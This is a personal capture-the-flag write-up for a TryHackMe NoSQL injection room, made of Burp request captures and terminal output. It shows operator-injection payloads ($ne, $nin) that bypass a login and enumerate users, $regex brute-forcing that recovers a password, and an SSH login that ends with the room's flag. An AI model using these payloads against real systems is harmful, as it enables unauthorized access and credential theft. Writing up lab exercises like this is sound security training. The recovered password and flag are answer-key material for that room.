# https://tryhackme.com/room/nosqlinjectiontutorial

# Bypassing the Login Screen

We want to manipulate the user and pass queries

> BURPSUITE

POST /login.php HTTP/1.1
Host: 10.10.127.110
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://10.10.127.110
Connection: close
Referer: http://10.10.127.110/
Upgrade-Insecure-Requests: 1

user=a&pass=a&remember=on


> Change so that it is: user[$ne]=a&pass[$ne]=a&remember=on

User:	admin
Password:	************
Full Name:	
email:	admin@nosql.int


> Logging in as Other Users

This time we use: user[$nin][]=admin&pass[$ne]=a&remember=on

POST /login.php HTTP/1.1
Host: 10.10.127.110
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://10.10.127.110
Connection: close
Referer: http://10.10.127.110/
Upgrade-Insecure-Requests: 1

user[$nin][]=admin&pass[$ne]=a&remember=on

User:	pedro
Password:	************
Full Name:	
email:	pcollins@nosql.int

user[$nin][]=admin&user[$nin][]=pedro&pass[$ne]=a&remember=on

User:	john
Password:	************
Full Name:	
email:	jsmith@nosql.int

user[$nin][]=admin&user[$nin][]=pedro&user[$nin][]=john&pass[$ne]=a&remember=on

Invalid user/password - Seems there are no more users

Total = 3 Users
Pedro begins with 'p'


> Extracting Users Passwords

Using Intruder - Set up the payload for a list of numbers

user=pedro&pass[$regex]=^.{§x§}$&remember=on

Filter for size - largest == 11

Use a similar technique for each character - alphanum

user=pedro&pass[$regex]=^§x§..........$&remember=on

user=pedro&pass[$regex]=^coolpass123$&remember=on

┌──(kali㉿kali)-[~/Documents/TryHackMe/NoSQL]
└─$ ssh pedro@10.10.127.110
The authenticity of host '10.10.127.110 (10.10.127.110)' can't be established.
ED25519 key fingerprint is SHA256:V/8G3mpnlCv/7PyT/47/lXkPvwwFule0P6GZ7ZbqpAk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.127.110' (ED25519) to the list of known hosts.
pedro@10.10.127.110's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Wed Jun 23 03:34:24 2021 from 192.168.100.250
pedro@nosql-nolife:~$ ls
flag.txt
pedro@nosql-nolife:~$ cat flag.txt
flag{N0Sql_n01iF3!}